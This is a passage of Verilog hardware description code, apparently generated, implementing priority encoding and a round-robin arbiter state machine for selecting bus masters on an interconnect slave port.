            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'h1 ) 
                begin
                    s1_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'h2 ) 
                    begin
                        s1_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s1_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[3] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[3]) ) 
        begin
            s1_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s1_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[4] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[4]) ) 
        begin
            s1_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'h1 ) 
                begin
                    s1_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'h2 ) 
                    begin
                        s1_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s1_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[4] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[4]) ) 
        begin
            s1_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s1_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[5] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[5]) ) 
        begin
            s1_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'h1 ) 
                begin
                    s1_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'h2 ) 
                    begin
                        s1_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s1_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[5] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[5]) ) 
        begin
            s1_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s1_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[6] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[6]) ) 
        begin
            s1_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'h1 ) 
                begin
                    s1_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'h2 ) 
                    begin
                        s1_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s1_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[6] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[6]) ) 
        begin
            s1_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s1_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[7] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[7]) ) 
        begin
            s1_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'h1 ) 
                begin
                    s1_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'h2 ) 
                    begin
                        s1_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s1_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s1_msel_pri_enc_valid[7] or  { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) })
    begin
        if (  !( s1_msel_pri_enc_valid[7]) ) 
        begin
            s1_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'h0 ) 
            begin
                s1_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s1_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s1_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s1_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd0_pri_out_d0 ) : ( s1_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s1_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd1_pri_out_d0 ) : ( s1_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd2_pri_out_d0 ) : ( s1_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd3_pri_out_d0 ) : ( s1_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd4_pri_out_d0 ) : ( s1_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd5_pri_out_d0 ) : ( s1_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd6_pri_out_d0 ) : ( s1_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd7_pri_out_d0 ) : ( s1_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s1_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd0_pri_out_d0 ) : ( s1_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s1_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd1_pri_out_d0 ) : ( s1_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd2_pri_out_d0 ) : ( s1_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd3_pri_out_d0 ) : ( s1_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd4_pri_out_d0 ) : ( s1_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd5_pri_out_d0 ) : ( s1_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd6_pri_out_d0 ) : ( s1_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd7_pri_out_d0 ) : ( s1_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s1_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s1_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s1_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s1_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s1_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s1_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s1_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s1_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd0_pri_out_d0 ) : ( s1_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s1_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd1_pri_out_d0 ) : ( s1_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd2_pri_out_d0 ) : ( s1_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd3_pri_out_d0 ) : ( s1_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd4_pri_out_d0 ) : ( s1_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd5_pri_out_d0 ) : ( s1_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd6_pri_out_d0 ) : ( s1_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s1_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s1_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s1_msel_pri_enc_pd7_pri_out_d0 ) : ( s1_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s1_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s1_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s1_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s1_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s1_next ) 
            begin
                s1_msel_pri_out <= ( ( ( s1_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s1_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s1_msel_pri_enc_pri_out0 ) : ( s1_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s1_msel_arb0_req = { ( s1_msel_req[7] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'd0 ) ), ( s1_msel_req[6] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'd0 ) ), ( s1_msel_req[5] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'd0 ) ), ( s1_msel_req[4] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'd0 ) ), ( s1_msel_req[3] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'd0 ) ), ( s1_msel_req[2] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'd0 ) ), ( s1_msel_req[1] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'd0 ) ), ( s1_msel_req[0] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'd0 ) ) };
    assign s1_msel_arb0_gnt = s1_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s1_msel_arb0_state <= s1_msel_arb0_grant0;
        end
        else
        begin 
            s1_msel_arb0_state <= s1_msel_arb0_next_state;
        end
    end
    always @ (  s1_msel_arb0_state or  { ( s1_msel_req[7] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[15] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[14] ) ) } == 2'd0 ) ), ( s1_msel_req[6] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[13] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[12] ) ) } == 2'd0 ) ), ( s1_msel_req[5] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[11] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[10] ) ) } == 2'd0 ) ), ( s1_msel_req[4] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[9] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[8] ) ) } == 2'd0 ) ), ( s1_msel_req[3] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[7] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[6] ) ) } == 2'd0 ) ), ( s1_msel_req[2] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[5] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[4] ) ) } == 2'd0 ) ), ( s1_msel_req[1] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[3] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[2] ) ) } == 2'd0 ) ), ( s1_msel_req[0] & ( { ( ( ( s1_msel_pri_sel == 2'd2 ) ) ? ( rf_conf1[1] ) : ( 1'b0 ) ), ( ( ( s1_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf1[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s1_msel_arb0_next_state = s1_msel_arb0_state;
        case ( s1_msel_arb0_state ) 
        s1_msel_arb0_grant0:
        begin
            if (  !( s1_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s1_msel_arb0_req[1] ) 
                begin
                    s1_msel_arb0_next_state = s1_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s1_msel_arb0_req[2] ) 
                    begin
                        s1_msel_arb0_next_state = s1_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s1_msel_arb0_req[3] ) 
                        begin
                            s1_msel_arb0_next_state = s1_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s1_msel_arb0_req[4] ) 
                            begin
                                s1_msel_arb0_next_state = s1_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s1_msel_arb0_req[5] ) 
                                begin
                                    s1_msel_arb0_next_state = s1_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb0_req[6] ) 
                                    begin
                                        s1_msel_arb0_next_state = s1_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb0_req[7] ) 
                                        begin
                                            s1_msel_arb0_next_state = s1_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb0_grant1:
        begin
            if (  !( s1_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s1_msel_arb0_req[2] ) 
                begin
                    s1_msel_arb0_next_state = s1_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s1_msel_arb0_req[3] ) 
                    begin
                        s1_msel_arb0_next_state = s1_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s1_msel_arb0_req[4] ) 
                        begin
                            s1_msel_arb0_next_state = s1_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s1_msel_arb0_req[5] ) 
                            begin
                                s1_msel_arb0_next_state = s1_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s1_msel_arb0_req[6] ) 
                                begin
                                    s1_msel_arb0_next_state = s1_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb0_req[7] ) 
                                    begin
                                        s1_msel_arb0_next_state = s1_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb0_req[0] ) 
                                        begin
                                            s1_msel_arb0_next_state = s1_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb0_grant2:
        begin
            if (  !( s1_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s1_msel_arb0_req[3] ) 
                begin
                    s1_msel_arb0_next_state = s1_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s1_msel_arb0_req[4] ) 
                    begin
                        s1_msel_arb0_next_state = s1_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s1_msel_arb0_req[5] ) 
                        begin
                            s1_msel_arb0_next_state = s1_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s1_msel_arb0_req[6] ) 
                            begin
                                s1_msel_arb0_next_state = s1_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s1_msel_arb0_req[7] ) 
                                begin
                                    s1_msel_arb0_next_state = s1_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s1_msel_arb0_req[0] ) 
                                    begin
                                        s1_msel_arb0_next_state = s1_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s1_msel_arb0_req[1] ) 
                                        begin
                                            s1_msel_arb0_next_state = s1_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s1_msel_arb0_grant3:
        begin
            if (  !( s1_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s1_msel_arb0_req[4] ) 
                begin
                    s1_msel_arb0_next_state = s1_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s1_msel_arb0_req[5] ) 
                    begin
